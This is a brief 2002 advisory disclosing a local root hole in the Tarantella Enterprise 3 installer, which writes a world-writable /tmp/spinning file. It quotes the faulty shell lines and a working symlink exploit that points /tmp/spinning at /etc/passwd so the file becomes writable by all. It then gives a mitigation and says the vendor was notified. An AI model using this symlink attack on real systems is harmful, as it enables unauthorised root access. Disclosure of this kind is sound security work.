======Local Root During Install of Tarantella 3======

//2/18/2002//

Another local root vulnerability during installation of Tarantella Enterprise 3.

During installation a "twirling / \ | - " text graphic is displayed (you remember them from the shareware games in DOS days..) they create a file in /tmp called spinning to determine at what state the installation is at. The files permissions are changed toread write excute for all, removed and recreated during different stages of the installation. It is vulnerabile to a simple symlink attack.

Problem Code:
<----snip---->
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1 <----snip---->

Exploit

There is no race condition here, just create the link.

[lwc@misery] ln -s /etc/passwd /tmp/spinning

Wait until root is done installing...

[lwc@misery] ls -l /etc/passwd
- -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

Recommendations

I again recommend the target system is running in single user mode before this software is installed.

The vendor has been notified and plans to fix this in the next release.

http://vapid.dhs.org